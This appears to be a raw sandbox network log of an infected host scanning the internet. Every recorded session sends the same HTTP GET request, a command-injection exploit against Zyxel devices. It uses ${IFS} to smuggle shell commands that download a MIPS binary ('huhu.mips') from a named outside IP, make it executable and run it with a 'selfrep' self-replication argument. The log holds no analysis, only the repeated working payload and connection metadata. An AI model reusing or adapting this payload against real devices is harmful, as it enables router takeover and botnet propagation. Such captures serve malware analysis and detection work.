                                      Jan 19, 2024 17:29:47.070023060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7951192.168.2.1454500109.56.177.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070051908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7952192.168.2.1453220190.70.168.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070131063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7953192.168.2.144139296.43.193.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070169926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7954192.168.2.145504688.214.177.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070175886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7955192.168.2.1437742124.60.83.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070224047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7956192.168.2.145603238.234.61.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070240021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7957192.168.2.1444006167.161.109.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070316076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7958192.168.2.1443046120.24.161.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070334911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7959192.168.2.1458830123.86.37.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070349932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7960192.168.2.143716218.9.201.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070383072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7961192.168.2.143318644.182.240.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070430994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7962192.168.2.145385091.116.7.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070517063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7963192.168.2.1447006169.142.137.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070594072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7964192.168.2.144573818.92.90.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070602894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7965192.168.2.144290468.3.12.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070616961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7966192.168.2.143412293.194.91.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070636988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7967192.168.2.1433184118.21.104.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070712090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7968192.168.2.1459698149.102.131.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070734024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7969192.168.2.145125277.149.20.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070771933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7970192.168.2.145595045.60.223.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070854902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7971192.168.2.144420224.188.5.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070854902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7972192.168.2.1451196149.118.66.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070899010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7973192.168.2.1439940160.251.166.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070918083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7974192.168.2.1456362192.109.166.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.070944071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7975192.168.2.144029845.99.176.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071005106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7976192.168.2.1441288194.63.131.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071055889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7977192.168.2.143357478.119.79.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071080923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7978192.168.2.145855088.218.12.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071126938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7979192.168.2.143442634.45.253.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071181059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7980192.168.2.1438678109.109.235.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071202993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7981192.168.2.1454700155.92.200.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071249008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7982192.168.2.1433904201.88.255.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071281910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7983192.168.2.1455678209.118.158.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071341991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7984192.168.2.1441866103.79.21.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071397066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7985192.168.2.143665863.163.127.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071432114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7986192.168.2.145002250.141.253.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071465015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7987192.168.2.1457244101.249.6.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071500063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7988192.168.2.1452718122.114.203.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071530104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7989192.168.2.1443280190.243.100.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071569920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7990192.168.2.1459702172.234.239.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071597099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7991192.168.2.143513823.195.217.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071643114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7992192.168.2.1459164150.42.167.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071686029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7993192.168.2.1459300136.229.18.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071722031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7994192.168.2.1455970177.190.91.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071762085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7995192.168.2.1446952146.222.228.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071810961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7996192.168.2.1441154128.134.6.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071856976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7997192.168.2.144366259.96.179.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071888924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7998192.168.2.1451866194.46.220.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071938038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7999192.168.2.1434560144.113.150.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.071968079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8000192.168.2.1459504101.153.11.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072021961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8001192.168.2.1438284106.113.144.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072058916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8002192.168.2.1432924179.202.253.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072094917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8003192.168.2.144674054.254.202.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072117090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8004192.168.2.14411682.204.214.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072160959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8005192.168.2.1433560142.122.247.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072217941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8006192.168.2.1435952202.191.176.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072273970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8007192.168.2.1448852201.219.154.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072326899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8008192.168.2.1456972139.205.31.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072365046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8009192.168.2.145797673.28.60.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072381020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8010192.168.2.1444260137.103.30.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072431087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8011192.168.2.1448696118.56.152.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072454929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8012192.168.2.1455738131.239.62.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072464943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8013192.168.2.1437672162.44.148.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072531939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8014192.168.2.1460432200.112.20.111443
                                      TimestampBytes transferredDirectionData
